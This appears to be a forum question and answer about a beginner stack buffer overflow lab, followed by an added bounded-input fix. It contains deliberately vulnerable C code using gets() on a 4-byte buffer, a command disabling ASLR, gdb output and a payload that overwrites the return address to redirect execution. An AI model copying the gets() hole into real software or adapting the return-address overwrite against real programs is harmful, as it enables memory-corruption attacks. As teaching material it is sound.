I turned off ASLR and turned off the gcc stack protector.
And I wrote vulnerable C code and tried to overflow the buffer, so I checked how many characters are needed for the crash. And I tried to change the return address to another function, but I got a message:
Segmentation fault (core dumped)
This is my C code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* target function: never called directly, only reached by overwriting the return address */
void sss()
{
    printf("good by");
}

void scriptpy(){
    printf("hello world\n");
}

int main(int argc , char** argv)
{
    char buf[4];
    gets(buf);   /* unbounded read: anything longer than the buffer overwrites the stack */
    return 0;
}
I found the address of the "sss" function and I tried to insert the hex value.
This is my address:
(gdb) disas sss
Dump of assembler code for function sss:
0x00000000000006ca <+0>: push %rbp
To edit the return address I insert:
printf "AAAABBBBB/xe2/x06/x00/x00/x00/x00/x00/x00" | ./cTutorial
Let's suppose that the binary is compiled with the flag -fno-stack-protector and that ASLR is disabled (echo 0 | sudo tee /proc/sys/kernel/randomize_va_space).
Find the crash:
The program starts crashing with a payload of 12 characters:
Controlling RIP
Using GDB to find the offset that overwrites RIP, we can see that the first byte of RIP can be overwritten with 0x41 ('A') with a payload of 13 characters:
Note that RIP is overwritten with 0041, where 00 is the null character terminating the string.
To control all bytes of RIP:
Let's suppose that the function sss is located at the address 0x0000555555555189. The final payload is:
Where 11 = 18 - (len('\x89\x51\x55\x55\x55\x55') + 1)
+1 for the null byte
The jump to the function sss is taken. The program will crash after the jump to the function sss as the stack will be corrupted.
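The root cause on both sides of this thread is the unbounded gets(buf) into a 4-byte buffer, which is why 12 or 13 characters already reach saved RBP and RIP. As an added example (not code from the question or the answer), here is the bounded replacement a fix would use: it reads at most sizeof(buf)-1 bytes, always NUL-terminates, and drains the rest of an over-long line so it cannot leak into a later read. feed_into_buf4 and fmemopen-based input are assumptions for the self-test; the input strings are constructed.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen */
#include <stdio.h>
#include <string.h>
/* Bounded replacement for gets(buf). Reads at most cap-1 bytes into dst,
 * always NUL-terminates, strips the newline, and consumes the rest of an
 * over-long line. Returns 1 if input was truncated, 0 if it fit, -1 on EOF. */
int read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';            /* whole line fit: strip newline */
        return 0;
    }
    /* No newline seen: the line was longer than the buffer, or the stream
     * ended without one. Drain up to newline/EOF instead of writing past dst. */
    int c, truncated = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated;
}
/* Hypothetical test helper: feed a constructed line through a char buf[4]
 * like the one in the question, copy what landed in it to out, return status. */
int feed_into_buf4(const char *input, char *out, size_t outcap)
{
    char buf[4] = "";                   /* same size as in the question */
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return -2;
    int status = read_line_bounded(buf, sizeof buf, in);
    fclose(in);
    if (outcap > 0) {
        strncpy(out, buf, outcap - 1);
        out[outcap - 1] = '\0';
    }
    return status;
}
int main(void)
{
    char got[4];
    /* constructed input: longer than the 12-byte crash payload from the answer */
    int st = feed_into_buf4("AAAABBBBBCCCC\n", got, sizeof got);
    printf("status=%d (1 = truncated), buf=\"%s\"\n", st, got);
    return 0;
}
```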